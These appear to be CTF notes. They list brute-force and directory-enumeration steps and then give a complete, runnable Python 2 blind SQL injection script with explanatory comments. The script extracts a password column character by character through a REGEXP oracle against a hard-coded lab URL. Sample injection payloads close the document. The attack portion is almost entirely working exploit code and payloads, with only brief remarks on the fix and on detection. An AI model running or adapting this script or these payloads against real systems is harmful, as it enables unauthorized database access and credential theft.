1、burp爆破用户名密码
2、id,userid,useId多试几次
3、爆破后台目录,index.php,users.php,login.php,flag.php
4、脚本:
# -*- coding:utf-8 -*-
import httplib
import re
import urllib
class Attacker:
    """Blind, character-at-a-time SQL injection oracle (Python 2 code).

    Each GET request ends the query string with
    ``' or <column> regexp '^<prefix><candidate>' #``; the marker text
    ``useless`` in the response body is taken as "regex matched", and the
    targeted column value is rebuilt one character per alphabet sweep.
    The page does not show where ``useless`` comes from; presumably it is
    text the target emits only when the injected condition is true --
    verify against the real response before trusting the oracle.

    The oracle exists only because the ``userId`` parameter is concatenated
    into the SQL statement; a parameterized query removes it. The long run
    of near-identical requests carrying ``regexp`` in the query string is
    the obvious detection signal in web-server logs.
    """

    def __init__(self, mode, url):
        """Record the target URL and injection mode and build the alphabet.

        mode: 1 injects on the ``username`` column, 2 on ``password``
              (see crack()); any other value is not handled there.
        url:  full target URL, e.g. ``http://host/path?userId=2``; the
              payload is appended directly to it.
        """
        self.url = url
        # get_domin() reads only self.url, so calling it before self.mode
        # is set is fine.
        self.domin = self.get_domin()
        self.mode = mode
        # Search alphabet: a-z, A-Z, 0-9 in that order. Characters outside
        # this set are never tried, so a value containing e.g. '_' or '-'
        # cannot be recovered past that character. '9' being the LAST entry
        # matters: crack() relies on it as the "sweep exhausted" marker.
        str1 = []
        for i in range(26):
            str1.append(chr(ord('a') + i))
        for i in range(26):
            str1.append(chr(ord('A') + i))
        for i in range(10):
            str1.append(chr(ord('0') + i))
        self.str_box = str1

    def get_domin(self):
        """Return the host part (``host`` or ``host:port``) of self.url.

        Any scheme starting with ``http`` (so ``https`` too) is stripped;
        without ``://`` the whole string up to the first ``/`` is taken.
        NOTE(review): a scheme-less URL whose host itself starts with
        ``http`` would index url_a[1] and raise IndexError.
        """
        url = self.url
        url_a = url.split('://')
        if re.match('^http',url_a[0]):
            url = url_a[1]
        else:
            url = url_a[0]
        url_a = url.split('/')
        domin = url_a[0]
        return domin

    def crack(self):
        """Recover the targeted column value and print it, one char per sweep.

        Side effects: one plain-HTTP GET per candidate character, progress
        printed to stdout, and the final value stored in self.name (without
        the leading '^').
        """
        # Plain HTTP is used regardless of the scheme given in self.url.
        conn = httplib.HTTPConnection(self.domin)
        if self.mode == 1:
            aim = 'username'
        if self.mode == 2:
            aim = 'password'
        # For any mode other than 1 or 2 ``aim`` is never bound and the
        # urllib.quote line below raises NameError; that is outside the
        # try block, so it propagates to the caller.
        url = self.url
        # The two percent-encoded halves around the regex:
        # "' or <aim> regexp '" ... "' #". The '^prefix' and the candidate
        # character between them are appended raw, not quoted.
        attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'')
        attack_url2 = urllib.quote('\' #')
        str_box = self.str_box
        try:
            # ``string`` is the anchored regex built so far: '^' + known prefix.
            string = '^'
            while True:
                for str_end in str_box:
                    url_to_attack = url + attack_url1 + string + str_end + attack_url2
                    #print url_to_attack
                    # The absolute URL (scheme + host + path) is sent as the
                    # request target.
                    conn.request(method="GET", url=url_to_attack)
                    response = conn.getresponse()
                    res = response.read()
                    # Oracle check: marker found at offset >= 1 means the
                    # regex matched (an occurrence at offset 0 is not counted).
                    if res.find('useless') > 0:
                        string = string + str_end
                        # -1 flags "hit in this sweep" for the check after the loop.
                        str_end = -1
                        print string[1:] # original note: "un-comment to watch progress" -- the print is already active here
                        break
                # A sweep with no hit leaves str_end at '9', the last alphabet
                # entry: no character extends the prefix, so stop.
                if str_end != -1 and str_end == '9':
                    break
            self.name = string
            print self.name[1:]
        except:
            # Bare except: every failure (network errors, and also
            # KeyboardInterrupt) is collapsed into this generic message.
            print "Something Wrong"
            print url
def main():
    """Run one injection pass against the hard-coded target URL.

    The first constructor argument selects the column: 1 = username,
    2 = password (this run uses 2).
    """
    target = 'http://10.200.91.28/zebCTF/users.php?userId=2'
    # 1 = inject on username, 2 = inject on password
    Attacker(2, target).crack()
if __name__ == '__main__':
    # Script entry point; nothing runs on import.
    main()
正则注入
userId=2%27%20or username REGEXP '^A' %23
userId=2%27%20or username REGEXP '^a' %23
userId=2%27%20or username REGEXP '^Z' %23